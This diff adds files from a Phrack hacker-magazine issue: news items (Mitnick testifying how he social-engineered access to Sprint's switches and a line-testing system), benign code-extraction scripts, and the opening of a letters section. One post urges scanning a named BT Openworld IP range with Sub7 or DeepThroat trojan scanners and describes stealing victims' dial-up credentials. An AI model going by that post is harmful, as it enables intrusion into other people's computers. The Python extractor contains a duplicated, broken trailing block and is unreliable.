+how he illegally cracked Sprint of Nevada's network, while the attorney for
+the victim company attacked his testimony, effectively accusing the
+ex-hacker of being innocent.
+
+The plaintiff in the case, Munoz, 43, is accusing Sprint of negligence in
+allegedly allowing hackers to control their network to the benefit of a few
+crooked businesses. Munoz is the publisher of an adult advertising paper
+that sells the services of a bevy of in-room entertainers, whose phone
+numbers are supposed to ring to Munoz's switchboard.  Instead, callers
+frequently get false busy signals, or reach silence, Munoz claims.
+Occasionally calls appear to be rerouted directly to a competitor.  Munoz's
+complaints have been echoed by other outcall service operators, bail
+bondsmen and private investigators -- some of whom appeared at two days of
+hearings in March to testify for Munoz against Sprint.
+
+Munoz hired Mitnick as a technical consultant in his case last year, after
+SecurityFocus Online reported that the ex-hacker -- a onetime Las Vegas
+resident -- claimed he had substantial access to Sprint's network up until
+his 1995 arrest.  After running some preliminary tests, Mitnick withdrew
+from the case when Munoz fell behind in paying his consulting fees.  On the
+last day of the March hearings, commissioner Adriana Escobar Chanos
+adjourned the matter to allow Munoz time to persuade Mitnick to testify, a
+feat Munoz pulled-off just in time for Monday's hearing.
+
+Mitnick admitted that his testing produced no evidence that Munoz is
+experiencing call diversion or blocking. But his testimony casts doubt on
+Sprint's contention that such tampering is unlikely, or impossible.  With
+the five year statute of limitations long expired, Mitnick appeared
+comfortable describing with great specificity how he first gained access
+to Sprint's systems while living in Las Vegas in late 1992 or early 1993,
+and then maintained that access while a fugitive.
+
+Mitnick testified that he could connect to the control consoles -- quaintly
+called "visual display units" -- on each of Vegas' DMS-100 switching
+systems through dial-up modems intended to allow the switches to be
+serviced remotely by the company that makes them, Ontario-based Northern
+Telecom, renamed in 1999 to Nortel Networks.
+
+Each switch had a secret phone number, and a default username and password,
+he said.  He obtained the phone numbers and passwords from Sprint employees
+by posing as a Nortel technician, and used the same ploy every time he
+needed to use the dial-ups, which were inaccessible by default.                                               
+
+With access to the switches, Mitnick could establish, change, redirect or
+disconnect phone lines at will, he said.
+
+That's a far cry from the unassailable system portrayed at the March
+hearings, when former company security investigator Larry Hill -- who
+retired from Sprint in 2000 -- testified "to my knowledge there's no way
+that a computer hacker could get into our systems."  Similarly, a May 2001
+filing by Scott Collins of Sprint's regulatory affairs department said that
+to the company's knowledge Sprint's network had "never been penetrated or
+compromised by so-called computer hackers."
+
+Under cross examination Monday by PUC staff attorney Louise Uttinger,
+Collins admitted that Sprint maintains dial-up modems to allow Nortel
+remote access to their switches, but insisted that Sprint had improved
+security on those lines since 1995, even without knowing they'd been                                       
+compromised before.
+
+But Mitnick had more than just switches up his sleeve Monday.
+
+The ex-hacker also discussed a testing system called CALRS (pronounced
+"callers"), the Centralized Automated Loop Reporting System. Mitnick                                           
+first described CALRS to SecurityFocus Online last year as a system that
+allows Las Vegas phone company workers to run tests on customer lines from
+a central location.  It consists of a handful of client computers, and
+remote servers attached to each of Sprint's DMS-100 switches.
+
+Mitnick testified Monday that the remote servers were accessible through
+300 baud dial-up modems, guarded by a technique only slightly more secure
+than simple password protection: the server required the client -- normally
+a computer program -- to give the proper response to any of 100 randomly
+chosen challenges.  The ex-hacker said he was able to learn the Las Vegas
+dial-up numbers by conning Sprint workers, and he obtained the "seed list"
+of challenges and responses by using his social engineering skills on
+Nortel, which manufactures and sells the system.
+
+The system allows users to silently monitor phone lines, or originate calls
+on other people's lines, Mitnick said.
+
+Mitnick's claims seemed to inspire skepticism in the PUC's technical
+advisor, who asked the ex-hacker, shortly before the hearing was to break
+for lunch, if he could prove that he had cracked Sprint's network.  Mitnick
+said he would try.
+
+Two hours later, Mitnick returned to the hearing room clutching a crumpled,
+dog-eared and torn sheet of paper, and a small stack of copies for the
+commissioner, lawyers, and staff.
+
+At the top of the paper was printed "3703-03 Remote Access Password List."
+A column listed 100 "seeds", numbered "00" through "99," corresponding to a
+column of four digit hexadecimal "passwords," like "d4d5" and "1554."
+
+Commissioner Escobar Chanos accepted the list as an exhibit over the
+objections of Sprint attorney Patrick Riley, who complained that it hadn't
+been provided to the company in discovery.  Mitnick retook the stand and
+explained that he used the lunch break to visit a nearby storage locker
+that he'd rented on a long-term basis years ago, before his arrest.  "I
+wasn't sure if I had it in that storage locker," said Mitnick.  "I hadn't
+been there in seven years."
+
+"If the system is still in place, and they haven't changed the seed list,
+you could use this to get access to CALRS," Mitnick testified.  "The system
+would allow you to wiretap a line, or seize dial tone."
+
+Mitnick's return to the hearing room with the list generated a flurry of
+activity at Sprint's table; Ann Pongracz, the company's general counsel,
+and another Sprint employee strode quickly from the room -- Pongracz
+already dialing on a cell phone while she walked.  Riley continued his
+cross examination of Mitnick, suggesting, again, that the ex-hacker may
+have made the whole thing up. "The only way I know that this is a Nortel
+document is to take you at your word, correct?," asked Riley.  "How do we
+know that you're not social engineering us now?"
+
+Mitnick suggested calmly that Sprint try the list out, or check it with
+Nortel.  Nortel could not be reached for comment.
+
+
+|=[ 0x05 - Feds may require all email to be kept by ISP's ]=-------------=|
+
+By Kelley Beaucar Vlahos
+Fox News
+
+WASHINGTON - It may sound like a plot device for a futuristic movie, but
+the federal government may not be far from forcing Internet service
+providers to keep copies of all e-mail exchanges in the interest of
+homeland security.
+
+The White House denied a Washington Post report Thursday alleging that the
+Al Qaeda terrorist network is working on using online and stored data to
+disrupt the workings of power grids, air traffic towers, dams, and other
+infrastructure. But a White House official did acknowledge that Al Qaeda
+has an interest in developing such abilities.
+
+And it's that interest that has technology circles wondering if the
+federal government is going to follow the European Union's lead in passing
+legislation that would allow the government to mine data on customers saved
+by ISPs.
+
+Last month, the European Union passed a resolution that would require all
+ISPs to store for up to seven years e-mail message headers, Web-surfing
+histories, chat logs, pager records, phone and fax connections, passwords,
+and more.
+
+Already, Germany, France, Belgium, and Spain have drafted laws that comply
+with the directive. Technology experts say the U.S. federal government may
+try to do the same thing using the vast law enforcement allowances provided
+under the USA Patriot Act.
+
+"They drafted the Patriot Act to lower all of the thresholds for the
+invasion of privacy," said Gene Riccoboni, a New York-based Internet
+lawyer who said he has found loopholes in the anti-terror legislation
+that could open up the possibility for an EU-style data retention provision.                                                
+
+Under the Patriot Act signed into law in October, law enforcement needs as
+little as an administrative subpoena to trace names, e-mail addresses,
+types of Internet access individuals use, and credit card numbers used online.                                      
+|=[ 0x06 - BT OPENWORLD silent over infection /Customers still clueless ]=|
+
+From: "Bakb0ne"
+Subject: [phrackstaff] WORLD NEWS / BT OPENWORLD silent over infection /
+    Customers still clueless after nearly 2 yrs
+
+
+    Btopenworld [1] have been notified to a problem with their Customers
+computers being infected with the DEEPTHROAT, SUB7 and BO server files
+(Available from [2]) The computers were infected by downloading and
+installing BTOWs Dialler Software. Bt were aware of this fact around 18
+months ago and the only thing they have done is replace the infected
+download with a fresh copy of their software. 
+
+    No customers have been notified and there are still hundreds of users
+infected with the trojans. Just scan the Ip range 213.122.*.* using the
+DeepThroat or Sub7 ip scanner and you will see for yourself...
+
+    Oh.. one positive note is that BTOW have changed the way you pdate
+Credit Card information. Previously you could simple use DT to do a
+"RAS RIP" (steal dialup info), Go onto the BTOW account details section and
+log-on. Sometimes you would have to enter D.O.B and mothers maiden name..
+but with access to your victims machine this was never hard to get... 
+
+    Before you all start going on about how LAME trojans are and only
+Script-Kiddies use them, think about the damage they do and how popular
+they are. The reason why I have been using the trojans mentioned above is
+to see how many ppl are infected and what is posible to access with these
+programs installed on a target puter...
+
+    Oh and I always inform the ppl that they are infected and how to remove
+the Trojan form their Machine..
+
+
+Bakb0ne (Bakb0ne@BTopenworld.com)
+
+[1] Http://www.BtOpenworld.com
+[2] Http://www.tlsecurity.com
+
+
+|=[ 0x07 - DeCCS is Free Speech ]=---------------------------------------=|
+
+An appeals court in California has sided with DVD code crackers like
+teenage computer whiz-kid Jon Johansen from Norway. The ruling is a kick in
+the face of the multi-billion-dollar entertainment industry, which is
+trying to protect its warez by censorship.
+
+Jon Johansen, aslo known by the tabloid as DVD-Jon, ran into trouble when
+he (with some friends) reverse-engineered the DVD codes and shared the
+findings on the Internet. He was sued by some of the biggest names in the
+entertainment industry when he made it harder for them to control viewing
+videos and CDs.
+
+The CSS algorithm was extremly weak, this made it easy to recover the keys
+used by other DVD players, breaking the entire system.
+
+http://www.users.zetnet.co.uk/hopwood/crypto/decss/
+http://www.thefab.net/topics/computing/co25_deccs_free_speech.htm
+
+
+|=[ 0x08 - Gnutella developer Gene Kan, 25, commits suicide ]=-----------=|
+
+By Reuters
+
+SAN FRANCISCO (REUTERS) - Gene Kan, one of the key programmers behind the
+popular file-sharing technology known as Gnutella, has died in an apparent
+suicide, officials said on Tuesday.  He was 25.
+
+San Mateo County Coroner spokeswoman Sue Turner said Kan was found last
+week at his northern California home.
+
+"The cause of death was a perforating gunshot wound to the head," Tuner
+said.  "It was a suicide."
+
+A spokeswoman for Kan said he died on June 29 and was cremated on July 5.
+Further details were being withheld at the request of the family.
+
+Kan helped develop an open source version of the Gnutella protocol, which
+marked a further step in popularizing the peer-to-peer file-sharing
+revolution pioneered by the Napster song-swapping service.
+
+|=[ EO PWN ]=------------------------------------------------------------=|
+
diff --git a/phrack59/18.txt b/phrack59/18.txt
new file mode 100644
index 0000000..b67946e
--- /dev/null
+++ b/phrack59/18.txt
@@ -0,0 +1,754 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3b, Phile #0x12 of 0x12
+
+|=--------=[ P H R A C K   E X T R A C T I O N   U T I L I T Y ]=--------=|
+|=-----------------------------------------------------------------------=|
+|=--------------------------=[ phrackstaff ]=----------------------------=|
+
+The Phrack Magazine Extraction Utility, first appearing in P50, is a
+convenient way to extract code from textual ASCII articles.  It preserves
+readability and 7-bit clean ASCII codes.  As long as there are no
+extraneous "<++>" or <-->" in the article, everything runs swimmingly.
+
+Source and precompiled version (windows, unix, ...) is available at
+http://www.phrack.org/misc.
+
+|=-----------------------------------------------------------------------=|
+
+<++> extract/extract4.c !8e2bebc6
+
+/*
+ *  extract.c by Phrack Staff and sirsyko
+ *
+ *  Copyright (c) 1997 - 2000 Phrack Magazine
+ *
+ *  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ *
+ *  extract.c
+ *  Extracts textfiles from a specially tagged flatfile into a hierarchical 
+ *  directory structure.  Use to extract source code from any of the articles 
+ *  in Phrack Magazine (first appeared in Phrack 50).
+ *
+ *  Extraction tags are of the form:
+ *
+ *  host:~> cat testfile
+ *  irrelevant file contents
+ *  <++> path_and_filename1 !CRC32
+ *  file contents
+ *  <-->
+ *  irrelevant file contents
+ *  <++> path_and_filename2 !CRC32
+ *  file contents
+ *  <-->
+ *  irrelevant file contents
+ *  <++> path_and_filenamen !CRC32
+ *  file contents
+ *  <-->
+ *  irrelevant file contents
+ *  EOF
+ *
+ *  The `!CRC` is optional.  The filename is not.  To generate crc32 values 
+ *  for your files, simply give them a dummy value initially.  The program
+ *  will attempt to verify the crc and fail, dumping the expected crc value.
+ *  Use that one.  i.e.:
+ *
+ *  host:~> cat testfile
+ *  this text is ignored by the program
+ *  <++> testarooni !12345678
+ *  text to extract into a file named testarooni
+ *  as is this text
+ *  <--> 
+ *
+ *  host:~> ./extract testfile
+ *  Opened testfile
+ *   - Extracting testarooni
+ *   crc32 failed (12345678 != 4a298f18)
+ *  Extracted 1 file(s).  
+ *
+ *  You would use `4a298f18` as your crc value.
+ *
+ *  Compilation:
+ *  gcc -o extract extract.c
+ *  
+ *  ./extract file1 file2 ... filen
+ */
+
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <string.h>
+#include <dirent.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <errno.h>
+
+#define VERSION         "7niner.20000430 revsion q"
+
+#define BEGIN_TAG       "<++> "
+#define END_TAG         "<-->"
+#define BT_SIZE         strlen(BEGIN_TAG)
+#define ET_SIZE         strlen(END_TAG)
+#define EX_DO_CHECKS    0x01
+#define EX_QUIET        0x02
+
+struct f_name
+{
+    u_char name[256];
+    struct f_name *next;
+};
+
+unsigned long crcTable[256];
+
+
+void crcgen() 
+{
+    unsigned long crc, poly;
+    int i, j;
+    poly = 0xEDB88320L;
+    for (i = 0; i < 256; i++)
+    {
+        crc = i;
+        for (j = 8; j > 0; j--)
+        {
+            if (crc & 1)
+            {
+                crc = (crc >> 1) ^ poly;
+            } 
+            else
+            {
+                crc >>= 1;
+            }
+        }
+        crcTable[i] = crc;
+    }
+}
+
+        
+unsigned long check_crc(FILE *fp)
+{
+    register unsigned long crc;
+    int c;
+
+    crc = 0xFFFFFFFF;
+    while( (c = getc(fp)) != EOF )
+    {
+         crc = ((crc >> 8) & 0x00FFFFFF) ^ crcTable[(crc ^ c) & 0xFF];
+    }
+ 
+    if (fseek(fp, 0, SEEK_SET) == -1)
+    {
+        perror("fseek");
+        exit(EXIT_FAILURE);
+    }
+
+    return (crc ^ 0xFFFFFFFF);
+}
+
+
+int
+main(int argc, char **argv)
+{ 
+    char *name;
+    u_char b[256], *bp, *fn, flags;
+    int i, j = 0, h_c = 0, c;
+    unsigned long crc = 0, crc_f = 0;
+    FILE *in_p, *out_p = NULL;
+    struct f_name *fn_p = NULL, *head = NULL, *tmp = NULL;
+
+    while ((c = getopt(argc, argv, "cqv")) != EOF)
+    {
+        switch (c)
+        {
+            case 'c':
+                flags |= EX_DO_CHECKS;
+                break;
+            case 'q':
+                flags |= EX_QUIET;
+                break;
+            case 'v':
+                fprintf(stderr, "Extract version: %s\n", VERSION);
+                exit(EXIT_SUCCESS);
+        }
+    }
+    c = argc - optind;
+
+    if (c < 2)
+    {
+        fprintf(stderr, "Usage: %s [-cqv] file1 file2 ... filen\n", argv[0]);
+        exit(0); 
+    }
+
+    /*
+     *  Fill the f_name list with all the files on the commandline (ignoring
+     *  argv[0] which is this executable).  This includes globs.
+     */
+    for (i = 1; (fn = argv[i++]); )
+    {
+        if (!head)
+        {
+            if (!(head = (struct f_name *)malloc(sizeof(struct f_name))))
+            {
+                perror("malloc");
+                exit(EXIT_FAILURE);
+            }
+            strncpy(head->name, fn, sizeof(head->name));
+            head->next = NULL;
+            fn_p = head;
+        }
+        else
+        {
+            if (!(fn_p->next = (struct f_name *)malloc(sizeof(struct f_name))))
+            {
+                perror("malloc");
+                exit(EXIT_FAILURE);
+            }
+            fn_p = fn_p->next;
+            strncpy(fn_p->name, fn, sizeof(fn_p->name));
+            fn_p->next = NULL;
+        }
+    }
+    /*
+     *  Sentry node.
+     */
+    if (!(fn_p->next = (struct f_name *)malloc(sizeof(struct f_name))))
+    {
+        perror("malloc");
+        exit(EXIT_FAILURE);
+     }
+    fn_p = fn_p->next;
+    fn_p->next = NULL;
+
+    /*
+     *  Check each file in the f_name list for extraction tags.
+     */
+    for (fn_p = head; fn_p->next; )
+    {
+        if (!strcmp(fn_p->name, "-"))
+        {
+            in_p = stdin;
+            name = "stdin";
+        }
+        else if (!(in_p = fopen(fn_p->name, "r")))
+        {
+            fprintf(stderr, "Could not open input file %s.\n", fn_p->name);
+            fn_p = fn_p->next;
+	    continue;
+        }
+        else
+        {
+            name = fn_p->name;
+        }
+
+        if (!(flags & EX_QUIET))
+        {
+            fprintf(stderr, "Scanning %s...\n", fn_p->name);
+        }
+        crcgen();
+        while (fgets(b, 256, in_p))
+        { 
+            if (!strncmp(b, BEGIN_TAG, BT_SIZE))
+            {
+	        b[strlen(b) - 1] = 0;           /* Now we have a string. */
+                j++;
+
+                crc = 0;
+                crc_f = 0;
+                if ((bp = strchr(b + BT_SIZE + 1, '/')))
+                {
+                    while (bp)
+                    {
+		        *bp = 0;
+                        if (mkdir(b + BT_SIZE, 0700) == -1 && errno != EEXIST)
+                        {
+                            perror("mkdir");
+                            exit(EXIT_FAILURE);
+                        }
+                        *bp = '/';
+		        bp = strchr(bp + 1, '/'); 
+		    }
+                }
+
+                if ((bp = strchr(b, '!')))
+                {
+                    crc_f = 
+                        strtoul((b + (strlen(b) - strlen(bp)) + 1), NULL, 16);
+                   b[strlen(b) - strlen(bp) - 1 ] = 0;
+                   h_c = 1;
+                }
+                else
+                {
+                    h_c = 0;
+                }
+                if ((out_p = fopen(b + BT_SIZE, "wb+")))
+                {
+                    fprintf(stderr, ". Extracting %s\n", b + BT_SIZE);
+                }
+                else
+                {
+        	    printf(". Could not extract anything from '%s'.\n",
+                        b + BT_SIZE);
+        	    continue;
+                }
+            }
+            else if (!strncmp (b, END_TAG, ET_SIZE))
+            {
+                if (out_p)
+                {
+                    if (h_c == 1)
+                    {
+                        if (fseek(out_p, 0l, 0) == -1)
+                        {
+                            perror("fseek");
+                            exit(EXIT_FAILURE);
+                        }
+                        crc = check_crc(out_p);
+                        if (crc == crc_f && !(flags & EX_QUIET))
+                        {
+                            fprintf(stderr, ". CRC32 verified (%08lx)\n", crc);
+                        }
+                        else
+                        {
+                            if (!(flags & EX_QUIET))
+                            {
+                                fprintf(stderr, ". CRC32 failed (%08lx != %08lx)\n",
+                                        crc_f, crc);
+                            }
+                        }
+                    }
+                    fclose(out_p);
+                }
+	        else
+                {
+	            fprintf(stderr, ". `%s` had bad tags.\n", fn_p->name);
+		    continue;
+	        }
+            }
+            else if (out_p)
+            {
+                fputs(b, out_p);
+            }
+        }
+        if (in_p != stdin)
+        {
+            fclose(in_p);
+        }
+        tmp = fn_p;
+        fn_p = fn_p->next;
+        free(tmp);
+    }
+    if (!j)
+    {
+        printf("No extraction tags found in list.\n");
+    }
+    else
+    {
+        printf("Extracted %d file(s).\n", j);
+    }
+    return (0);
+}
+/* EOF */
+<-->
+<++> extract/extract.pl !1a19d427
+# Daos <daos@nym.alias.net>
+#!/bin/sh -- # -*- perl -*- -n
+eval 'exec perl $0 -S ${1+"$@"}' if 0;
+
+$opening=0;
+
+if (/^\<\+\+\>/) {$curfile = substr($_ , 5); $opening=1;};
+if (/^\<\-\-\>/) {close ct_ex; $opened=0;}; 
+if ($opening) {                        
+        chop $curfile;                 
+        $sex_dir= substr( $curfile, 0, ((rindex($curfile,'/'))) ) if ($curfile =~ m/\//);
+        eval {mkdir $sex_dir, "0777";}; 
+        open(ct_ex,">$curfile"); 
+        print "Attempting extraction of $curfile\n";
+        $opened=1; 
+}
+if ($opened && !$opening) {print ct_ex $_}; 
+<-->
+
+<++> extract/extract.awk !26522c51
+#!/usr/bin/awk -f
+#
+# Yet Another Extraction Script
+# - <sirsyko>
+#
+/^\<\+\+\>/ {
+        ind = 1
+        File = $2
+        split ($2, dirs, "/")
+        Dir="."
+        while ( dirs[ind+1] ) {
+                Dir=Dir"/"dirs[ind]
+                system ("mkdir " Dir" 2>/dev/null")
+                ++ind
+        }
+        next
+}
+/^\<\-\-\>/ {
+        File = ""
+        next
+}
+File { print >> File }
+<-->
+<++> extract/extract.sh !a81a2320
+#!/bin/sh
+# exctract.sh : Written 9/2/1997 for the Phrack Staff by <sirsyko>
+#
+# note, this file will create all directories relative to the current directory
+# originally a bug, I've now upgraded it to a feature since I dont want to deal
+# with the leading / (besides, you dont want hackers giving you full pathnames
+# anyway, now do you :)
+# Hopefully this will demonstrate another useful aspect of IFS other than 
+# haxoring rewt
+#
+# Usage: ./extract.sh <filename>
+
+cat $* | (
+Working=1
+while [ $Working ];
+do
+        OLDIFS1="$IFS"
+        IFS=
+        if read Line; then
+                IFS="$OLDIFS1"
+                set -- $Line
+                case "$1" in
+                "<++>") OLDIFS2="$IFS"
+                        IFS=/
+                        set -- $2
+                        IFS="$OLDIFS2"
+                        while [ $# -gt 1 ]; do
+                                File=${File:-"."}/$1
+                                if [ ! -d $File ]; then
+                                        echo "Making dir $File"
+                                        mkdir $File
+                                fi
+                                shift
+                        done                               
+                        File=${File:-"."}/$1
+                        echo "Storing data in $File"
+                ;;
+                "<-->") if [ "x$File" != "x" ]; then
+                                unset File
+                        fi ;;
+                *)      if [ "x$File" != "x" ]; then
+                                        IFS=
+                                        echo "$Line" >> $File
+                                        IFS="$OLDIFS1"
+                        fi
+                ;;
+                esac
+                IFS="$OLDIFS1"
+        else
+                echo "End of file"
+                unset Working
+        fi
+done
+)                                                                    
+<-->
+<++> extract/extract.py !83f65f60
+#! /bin/env python
+# extract.py    Timmy 2tone <_spoon_@usa.net>
+
+import sys, string, getopt, os
+
+class Datasink:
+    """Looks like a file, but doesn't do anything."""
+    def write(self, data): pass
+    def close(self): pass
+
+def extract(input, verbose = 1):
+    """Read a file from input until we find the end token."""
+
+    if type(input) == type('string'):
+        fname = input
+        try: input = open(fname)
+        except IOError, (errno, why):
+            print "Can't open %s: %s" % (fname, why)
+            return errno
+    else:
+        fname = '<file descriptor %d>' % input.fileno()
+
+    inside_embedded_file = 0
+    linecount = 0
+    line = input.readline()
+    while line:
+
+        if not inside_embedded_file and line[:4] == '<++>':
+
+            inside_embedded_file = 1
+            linecount = 0
+
+            filename = string.strip(line[4:])
+            if mkdirs_if_any(filename) != 0:
+                pass
+
+            try: output = open(filename, 'w')
+            except IOError, (errno, why):
+                print "Can't open %s: %s; skipping file" % (filename, why)
+                output = Datasink()
+                continue
+
+            if verbose:
+                print 'Extracting embedded file %s from %s...' % (filename,
+                                                                  fname),
+
+        elif inside_embedded_file and line[:4] == '<-->':
+            output.close()
+            inside_embedded_file = 0
+            if verbose and not isinstance(output, Datasink):
+                print '[%d lines]' % linecount
+
+        elif inside_embedded_file:
+            output.write(line)
+
+        # Else keep looking for a start token.
+        line = input.readline()
+        linecount = linecount + 1
+
+def mkdirs_if_any(filename, verbose = 1):
+    """Check for existance of /'s in filename, and make directories."""
+
+    path, file = os.path.split(filename)
+    if not path: return
+
+    errno = 0
+    start = os.getcwd()
+    components = string.split(path, os.sep)
+    for dir in components:
+        if not os.path.exists(dir):
+            try:
+                os.mkdir(dir)
+                if verbose: print 'Created directory', path
+
+            except os.error, (errno, why):
+                print "Can't make directory %s: %s" % (dir, why)
+                break
+
+        try: os.chdir(dir)
+        except os.error, (errno, why):
+            print "Can't cd to directory %s: %s" % (dir, why)
+            break
+
+    os.chdir(start)
+    return errno
+
+def usage():
+    """Blah."""
+    die('Usage: extract.py [-V] filename [filename...]')
+
+def main():
+    try: optlist, args = getopt.getopt(sys.argv[1:], 'V')
+    except getopt.error, why: usage()
+    if len(args) <= 0: usage()
+
+    if ('-V', '') in optlist: verbose = 0
+    else: verbose = 1
+
+    for filename in args:
+        if verbose: print 'Opening source file', filename + '...'
+        extract(filename, verbose)
+
+def db(filename = 'P51-11'):
+    """Run this script in the python debugger."""
+    import pdb
+    sys.argv[1:] = ['-v', filename]
+    pdb.run('extract.main()')
+
+def die(msg, errcode = 1):
+    print msg
+    sys.exit(errcode)
+
+if __name__ == '__main__':
+    try: main()
+    except KeyboardInterrupt: pass
+
+
+    except getopt.error, why: usage()
+    if len(args) <= 0: usage()
+
+    if ('-V', '') in optlist: verbose = 0
+    else: verbose = 1
+
+    for filename in args:
+        if verbose: print 'Opening source file', filename + '...'
+        extract(filename, verbose)
+
+def db(filename = 'P51-11'):
+    """Run this script in the python debugger."""
+    import pdb
+    sys.argv[1:] = [filename]
+    pdb.run('extract.main()')
+
+def die(msg, errcode = 1):
+    print msg
+    sys.exit(errcode)
+
+if __name__ == '__main__':
+    try: main()
+    except KeyboardInterrupt: pass              # No messy traceback.
+<-->
+<++> extract/extract-win.c !e519375d
+/***************************************************************************/
+/* WinExtract                                                              */
+/*                                                                         */
+/* Written by Fotonik <fotonik@game-master.com>.                           */
+/*                                                                         */
+/* Coding of WinExtract started on 22aug98.                                */
+/*                                                                         */
+/* This version (1.0) was last modified on 22aug98.                        */
+/*                                                                         */
+/* This is a Win32 program to extract text files from a specially tagged   */
+/* flat file into a hierarchical directory structure.  Use to extract      */
+/* source code from articles in Phrack Magazine.  The latest version of    */
+/* this program (both source and executable codes) can be found on my      */
+/* website:  http://www.altern.com/fotonik                                 */
+/***************************************************************************/
+
+
+#include <stdio.h>
+#include <string.h>
+#include <windows.h>
+
+
+void PowerCreateDirectory(char *DirectoryName);
+
+
+int WINAPI WinMain(HINSTANCE hThisInst, HINSTANCE hPrevInst,
+                   LPSTR lpszArgs, int nWinMode)
+{
+OPENFILENAME OpenFile; /* Structure for Open common dialog box */
+char InFileName[256]="";
+char OutFileName[256];
+char Title[]="WinExtract - Choose a file to extract files from.";
+FILE *InFile;
+FILE *OutFile;
+char Line[256];
+char DirName[256];
+int FileExtracted=0;   /* Flag used to determine if at least one file was */
+int i;                 /* extracted */
+
+ZeroMemory(&OpenFile, sizeof(OPENFILENAME));
+OpenFile.lStructSize=sizeof(OPENFILENAME);
+OpenFile.hwndOwner=HWND_DESKTOP;
+OpenFile.hInstance=hThisInst;
+OpenFile.lpstrFile=InFileName;
+OpenFile.nMaxFile=sizeof(InFileName)-1;
+OpenFile.lpstrTitle=Title;
+OpenFile.Flags=OFN_FILEMUSTEXIST | OFN_HIDEREADONLY;
+
+if(GetOpenFileName(&OpenFile))
+   {
+   if((InFile=fopen(InFileName,"r"))==NULL)
+      {
+      MessageBox(NULL,"Could not open file.",NULL,MB_OK);
+      return 0;
+      }
+
+   /* If we got here, InFile is opened. */
+   while(fgets(Line,256,InFile))
+      {
+      if(!strncmp(Line,"<++> ",5)) /* If line begins with "<++> " */
+         {
+         Line[strlen(Line)-1]='\0';
+         strcpy(OutFileName,Line+5);
+
+         /* Check if a dir has to be created and create one if necessary */
+         for(i=strlen(OutFileName)-1;i>=0;i--)
+            {
+            if((OutFileName[i]=='\\')||(OutFileName[i]=='/'))
+               {
+               strncpy(DirName,OutFileName,i);
+               DirName[i]='\0';
+               PowerCreateDirectory(DirName);
+               break;
+               }
+            }
+
+         if((OutFile=fopen(OutFileName,"w"))==NULL)
+            {
+            MessageBox(NULL,"Could not create file.",NULL,MB_OK);
+            fclose(InFile);
+            return 0;
+            }
+
+         /* If we got here, OutFile can be written to */
+         while(fgets(Line,256,InFile))
+            {
+            if(strncmp(Line,"<-->",4)) /* If line doesn't begin w/ "<-->" */
+               {
+               fputs(Line, OutFile);
+               }
+            else
+               {
+               break;
+               }
+            }
+         fclose(OutFile);
+         FileExtracted=1;
+         }
+      }
+   fclose(InFile);
+   if(FileExtracted)
+      {
+      MessageBox(NULL,"Extraction sucessful.","WinExtract",MB_OK);
+      }
+   else
+      {
+      MessageBox(NULL,"Nothing to extract.","Warning",MB_OK);
+      }
+   }
+   return 1;
+}
+
+
+/* PowerCreateDirectory is a function that creates directories that are */
+/* down more than one yet unexisting directory levels.  (e.g. c:\1\2\3) */
+void PowerCreateDirectory(char *DirectoryName)
+{
+int i;
+int DirNameLength=strlen(DirectoryName);
+char DirToBeCreated[256];
+
+for(i=1;i<DirNameLength;i++) /* i starts at 1, because we never need to */
+   {                         /* create '/' */
+   if((DirectoryName[i]=='\\')||(DirectoryName[i]=='/')||
+      (i==DirNameLength-1))
+      {
+      strncpy(DirToBeCreated,DirectoryName,i+1);
+      DirToBeCreated[i+1]='\0';
+      CreateDirectory(DirToBeCreated,NULL);
+      }
+   }
+}
+<-->
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack59/2.txt b/phrack59/2.txt
new file mode 100644
index 0000000..5f389c3
--- /dev/null
+++ b/phrack59/2.txt
@@ -0,0 +1,472 @@
+phrack.org:~# cat /dev/random
+
+                           ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3b, Phile #0x02 of 0x12
+
+|=----------------------=[ L O O P B A C K ]=----------------------------=|
+|=-----------------------------------------------------------------------=|
+|=------------------------=[ phrackstaff ]=------------------------------=|
+
+
+----| QUOTE of the month
+<phonic> is it legal?
+<cold-fire> dont know, im doing it from bonds box
+
+----| EXPLOIT of the month
+apache-scalp & OpenBSD memcpy() madness^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H
+openssh remote.
+
+----| TOPIC of the month (regarding OpenSSH)
+-:- Topic (#somewhere): changed by someone:
+"8 hours and 53 minutes without a remote hole in the default install!"
+
+----| LAMERZ of the month
+
+http://www.idefense.com/Intell/CI022702.html
+
+    [ or: how to convert public whois db files into .xls and finding
+      people who buy this bullshit. ]
+
+http://hackingtruths.box.sk/certi.htm
+
+    [ They try to make money out of everything: "Become a certificated
+      hacker today". ]
+
+|=[ 0x00 ]=--------------------------------------------------------------=|
+
+From: "Kenneth J. Bungert,,," <tnman@islc.net>
+Subject: harassment
+
+I have a question ?
+
+  [ I don't know... do you? ]
+
+Is there any way I can find out who is calling if it is from a computer...
+I think that is where the annoying calls are being made?
+
